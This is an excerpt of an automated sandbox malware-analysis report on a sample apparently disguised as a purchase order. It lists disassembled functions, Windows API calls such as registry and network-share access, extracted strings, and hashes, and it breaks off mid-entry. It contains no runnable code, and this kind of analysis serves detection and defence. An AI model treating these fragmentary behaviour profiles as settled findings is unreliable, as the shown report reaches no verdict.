                                                                    • Instruction ID: bee0439f3b1fffa3585930cbbcf2ad905746837485c977a7d591f47919040f98
                                                                    • Opcode Fuzzy Hash: 65381c4ccba23341be23c5a06cc134d952bc476d79eb7db99935d76efaa9b6d6
                                                                    • Instruction Fuzzy Hash: 8E71D470600215BFEB318F55DC89FAABF64FF04764F10822AF629A61E1C7715D60DBA0
                                                                    Function 00C677DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    • _memset.LIBCMT ref: 00C6786B
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C678A0
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C678BC
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C678D8
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C67902
                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C6792A
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C67935
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C6793A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 1411258926-22481851
                                                                    • Opcode ID: 60d53afa4147e525b8d4755eea43fce1ceb1ab5fc9a1dadf2bd52ddc738eb7d7
                                                                    • Instruction ID: 091493d106d7d212e67a6f3d32bfdeea64da81a29cba2ef9dd5bc7abcdaa7165
                                                                    • Opcode Fuzzy Hash: 60d53afa4147e525b8d4755eea43fce1ceb1ab5fc9a1dadf2bd52ddc738eb7d7
                                                                    • Instruction Fuzzy Hash: DF41087281422DABCF21EBA4DC95EEDB7B8FF04354F044629F915A31A1EA309E45DB90
                                                                    Function 00C90E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                    • API String ID: 3964851224-909552448
                                                                    • Opcode ID: ab99bd6af9eb8e8de71e1cdcf6b37fce688bdf6ecd52f0a51cf60cab22b964ee
                                                                    • Instruction ID: 7a90989bbf9678227b3376d1f1bb2069fae4d57e3da9b135052b8757ba47884e
                                                                    • Opcode Fuzzy Hash: ab99bd6af9eb8e8de71e1cdcf6b37fce688bdf6ecd52f0a51cf60cab22b964ee
                                                                    • Instruction Fuzzy Hash: 7941497211024A8FCF14EF50E869AEF3764FF11340F240458FC665B292DB319E5AEBA0
                                                                    Function 00C6F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C4E2A0,00000010,?,Bad directive syntax error,00C9F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C6F7C2
                                                                    • LoadStringW.USER32(00000000,?,00C4E2A0,00000010), ref: 00C6F7C9
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • _wprintf.LIBCMT ref: 00C6F7FC
                                                                    • __swprintf.LIBCMT ref: 00C6F81E
                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C6F88D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 1506413516-4153970271
                                                                    • Opcode ID: e3737f29621f02176610b3fb95bd8451250ae47effe85acc9a27fcf9ff8bf8ee
                                                                    • Instruction ID: 2c624883681fa162e9e781e3c11593e19e04a66c20876bfb666a33fc2b5315a8
                                                                    • Opcode Fuzzy Hash: e3737f29621f02176610b3fb95bd8451250ae47effe85acc9a27fcf9ff8bf8ee
                                                                    • Instruction Fuzzy Hash: 05219E3290421EEFCF11EF90CC5AFEE7778BF19300F04086AF515660A2EA319669EB50
                                                                    Function 00C752C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                      • Part of subcall function 00C17924: _memmove.LIBCMT ref: 00C179AD
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C75330
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C75346
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C75357
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C75369
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C7537A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$_memmove
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 2279737902-1007645807
                                                                    • Opcode ID: 1267b417b9cbe6784df8350da831cff1f61e939f1403a3897074a712760f9781
                                                                    • Instruction ID: 98c0c376f702c8d27c6fb731aa66888bbba5f710dc8d9b317da976b6c3af148a
                                                                    • Opcode Fuzzy Hash: 1267b417b9cbe6784df8350da831cff1f61e939f1403a3897074a712760f9781
                                                                    • Instruction Fuzzy Hash: AF119431A5012979D720B771CC5AEFF7B7CEBD2B90F00092DB415A20E1EEA04D49D6B0
                                                                    Function 00C746B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 208665112-3771769585
                                                                    • Opcode ID: 2d11cd0959c16bba0bc2ae805d1578724879e339384da3c35cc315ecba3602cd
                                                                    • Instruction ID: df259518ed2084f8b985dcd7bff1108c203c8a74bf21be026e02a9f46e23f96f
                                                                    • Opcode Fuzzy Hash: 2d11cd0959c16bba0bc2ae805d1578724879e339384da3c35cc315ecba3602cd
                                                                    • Instruction Fuzzy Hash: 9011E731600114AFCB28AB709C4AFDE77BCEF02711F0441BAF449D60A1EF719E82DA50
                                                                    Function 00C74F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 00C74F7A
                                                                      • Part of subcall function 00C3049F: timeGetTime.WINMM(?,75C0B400,00C20E7B), ref: 00C304A3
                                                                    • Sleep.KERNEL32(0000000A), ref: 00C74FA6
                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00C74FCA
                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C74FEC
                                                                    • SetActiveWindow.USER32 ref: 00C7500B
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C75019
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C75038
                                                                    • Sleep.KERNEL32(000000FA), ref: 00C75043
                                                                    • IsWindow.USER32 ref: 00C7504F
                                                                    • EndDialog.USER32(00000000), ref: 00C75060
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1194449130-3405671355
                                                                    • Opcode ID: 3604de9101bce16476e267fbb483d5a0530b71354f1a8519bfa689fab86ab46d
                                                                    • Instruction ID: ca30698cce84be88c078b28d7a31f864a41dbbe7aefd1a23a9d131181456fbb6
                                                                    • Opcode Fuzzy Hash: 3604de9101bce16476e267fbb483d5a0530b71354f1a8519bfa689fab86ab46d
                                                                    • Instruction Fuzzy Hash: EA21AC74606605AFE7105F70FC8CB2E3B69EB08745F14902BF119C21B9EBB58E91DB62
                                                                    Function 00C7D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • CoInitialize.OLE32(00000000), ref: 00C7D5EA
                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C7D67D
                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00C7D691
                                                                    • CoCreateInstance.OLE32(00CA2D7C,00000000,00000001,00CC8C1C,?), ref: 00C7D6DD
                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C7D74C
                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00C7D7A4
                                                                    • _memset.LIBCMT ref: 00C7D7E1
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00C7D81D
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C7D840
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00C7D847
                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C7D87E
                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 00C7D880
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                    • String ID:
                                                                    • API String ID: 1246142700-0
                                                                    • Opcode ID: 087f039d2aa9ae44397d1fb8f8324725d2e33782fb41e250971553a84c0439c3
                                                                    • Instruction ID: 44c2840727646ebb5c39b77c4ca37eb4a68ac18212ed2e552abf3352f658aac1
                                                                    • Opcode Fuzzy Hash: 087f039d2aa9ae44397d1fb8f8324725d2e33782fb41e250971553a84c0439c3
                                                                    • Instruction Fuzzy Hash: E3B10F75A00109AFDB04DF64C888EAEBBB9FF49314F148469F90AEB251DB30EE45DB50
                                                                    Function 00C6C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00C6C283
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00C6C295
                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C6C2F3
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00C6C2FE
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00C6C310
                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C6C364
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00C6C372
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00C6C383
                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C6C3C6
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00C6C3D4
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C6C3F1
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00C6C3FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: a5172204bbe8b1f61bda8538a9f0d255c38f7c9b3e9928ec7e74e3d1b7179ae5
                                                                    • Instruction ID: 82f504fec960139547a6b606f787f5e1bb495d80a729cbe3ad4a40b37fe0b607
                                                                    • Opcode Fuzzy Hash: a5172204bbe8b1f61bda8538a9f0d255c38f7c9b3e9928ec7e74e3d1b7179ae5
                                                                    • Instruction Fuzzy Hash: 54510D71B00205AFDB18CFA9DD99BBEBBBAEB88711F14813DF515D62A0D7709E418B10
                                                                    Function 00C1201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C12036,?,00000000,?,?,?,?,00C116CB,00000000,?), ref: 00C11B9A
                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C120D3
                                                                    • KillTimer.USER32(-00000001,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C1216E
                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00C4BCA6
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C4BCD7
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C4BCEE
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C4BD0A
                                                                    • DeleteObject.GDI32(00000000), ref: 00C4BD1C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 641708696-0
                                                                    • Opcode ID: 715fa9269b68a9156ad69f365eb36e9cadaaaa4f1241848e88e9628df2cd3b98
                                                                    • Instruction ID: 24f79d6f68c319f62b6e8cd6432ac928e95babac0462a13d0fa32d95f7bee595
                                                                    • Opcode Fuzzy Hash: 715fa9269b68a9156ad69f365eb36e9cadaaaa4f1241848e88e9628df2cd3b98
                                                                    • Instruction Fuzzy Hash: 6A619B34501A00DFCB359F15DD88B69B7F2FB45312F20856EE5528AAA4C770ADA1FB80
                                                                    Function 00C121A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C125DB: GetWindowLongW.USER32(?,000000EB), ref: 00C125EC
                                                                    • GetSysColor.USER32(0000000F), ref: 00C121D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ColorLongWindow
                                                                    • String ID:
                                                                    • API String ID: 259745315-0
                                                                    • Opcode ID: 0f5a5100391e214a41a6ed6bba0a954dd5240204ce46844e49e14e61be8f14bf
                                                                    • Instruction ID: 85a49d7e060e94c0bea44fd2aa3933d770899632d10ff960970d089abf637bf8
                                                                    • Opcode Fuzzy Hash: 0f5a5100391e214a41a6ed6bba0a954dd5240204ce46844e49e14e61be8f14bf
                                                                    • Instruction Fuzzy Hash: C2418F35100140EBDB255F28EC88BFD3B65EB47331F28426AFE658A1E5C7318D92EB61
                                                                    Function 00C7A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?,00C9F910), ref: 00C7A90B
                                                                    • GetDriveTypeW.KERNEL32(00000061,00CC89A0,00000061), ref: 00C7A9D5
                                                                    • _wcscpy.LIBCMT ref: 00C7A9FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 2820617543-1000479233
                                                                    • Opcode ID: 311cf33a15cfc07324f84884da4605c7eccf3236122ef4b6f88240f7c3a6ddba
                                                                    • Instruction ID: ca95541d658f73b23627103ebd55a48fe4c487ad4d4c735071c4787c610e3743
                                                                    • Opcode Fuzzy Hash: 311cf33a15cfc07324f84884da4605c7eccf3236122ef4b6f88240f7c3a6ddba
                                                                    • Instruction Fuzzy Hash: 8751AE311183019BC704EF14D8A2AAFB7A5EFC5710F14882DF59A972A2DB31DA49EB53
                                                                    Function 00C19837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __i64tow__itow__swprintf
                                                                    • String ID: %.15g$0x%p$False$True
                                                                    • API String ID: 421087845-2263619337
                                                                    • Opcode ID: cdcaef33ba3717b619f9fa2846284e11381362694841a317cdf4fad9f29706d8
                                                                    • Instruction ID: 90a6e7e6cf254e6cfe04e144b4a681ba34e2067811ab712a96235cc840c984a0
                                                                    • Opcode Fuzzy Hash: cdcaef33ba3717b619f9fa2846284e11381362694841a317cdf4fad9f29706d8
                                                                    • Instruction Fuzzy Hash: BA41E671510205AFEB24DF35D852EBAB7F8FF46300F20447EE559D7291EA319A42EB10
                                                                    Function 00C97152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C9716A
                                                                    • CreateMenu.USER32 ref: 00C97185
                                                                    • SetMenu.USER32(?,00000000), ref: 00C97194
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C97221
                                                                    • IsMenu.USER32(?), ref: 00C97237
                                                                    • CreatePopupMenu.USER32 ref: 00C97241
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C9726E
                                                                    • DrawMenuBar.USER32 ref: 00C97276
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                    • String ID: 0$F
                                                                    • API String ID: 176399719-3044882817
                                                                    • Opcode ID: 8bb907e3f842f75661f522204bb4e4e5bc08cbaa0c3068452ccc0e8385d14ae6
                                                                    • Instruction ID: 6ea67be89d96d979000809f5546716ebfc17d6ba7230bd5a62b1c353d4564f31
                                                                    • Opcode Fuzzy Hash: 8bb907e3f842f75661f522204bb4e4e5bc08cbaa0c3068452ccc0e8385d14ae6
                                                                    • Instruction Fuzzy Hash: F6414574A22205EFDF20DFA4D888F9ABBB5FF09310F14016AF915A7361D731AA10DB90
                                                                    Function 00C974BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
